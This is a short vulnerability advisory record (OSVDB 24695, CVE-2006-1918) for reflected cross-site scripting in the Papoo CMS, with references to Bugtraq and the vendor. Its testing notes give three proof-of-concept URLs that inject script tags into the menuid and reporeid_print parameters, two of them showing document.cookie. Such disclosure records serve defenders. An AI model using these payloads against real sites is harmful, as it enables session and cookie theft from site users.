Papoo index.php Multiple Variable XSS

2006-04-14T22:28:34
ID OSVDB:24695
Type osvdb
Reporter OSVDB
Modified 2006-04-14T22:28:34

Description

Manual Testing Notes

http://[target]/papoo/index.php?menuid=%3Cscript%3Ealert(document.cookie)%3C/script%3E&reporeid=1

http://[target]/papoo/forum.php?menuid=%3Cscript%3Ealert('whumpa%20whumpa')%3C/script%3E

http://[target]/papoo/print.php?reporeid_print=%3Cscript%3Ealert(document.cookie)%3C/script%3E&forumid=1

References:

Vendor URL: http://www.papoo.de/ Security Tracker: 1015939 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0275.html CVE-2006-1918 Bugtraq ID: 17530